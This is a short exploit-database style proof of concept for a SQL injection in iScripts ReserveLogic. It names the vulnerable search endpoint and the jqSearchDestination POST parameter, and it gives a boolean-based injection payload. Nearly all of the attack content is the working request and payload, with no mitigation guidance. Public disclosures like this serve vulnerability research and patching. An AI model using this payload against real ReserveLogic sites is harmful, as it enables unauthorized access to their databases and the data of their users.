Exploit Title: iScripts ReserveLogic - SQL Injection

Date: 29.03.2019

Exploit Author: Ahmet Ümit BAYRAM

Vendor Homepage: https://www.iscripts.com/reservelogic/

Demo Site: https://www.demo.iscripts.com/reservelogic/demo/

Version: Lastest

Tested on: Kali Linux

CVE: N/A

—– PoC: SQLi —–

Request: http://localhost/[PATH]/search Vulnerable Parameter: jqSearchDestination (POST) Payload: jqSearchDestination=(SELECT (CASE WHEN (8124=8124) THEN 12345 ELSE (SELECT 3029 UNION SELECT 1241) END))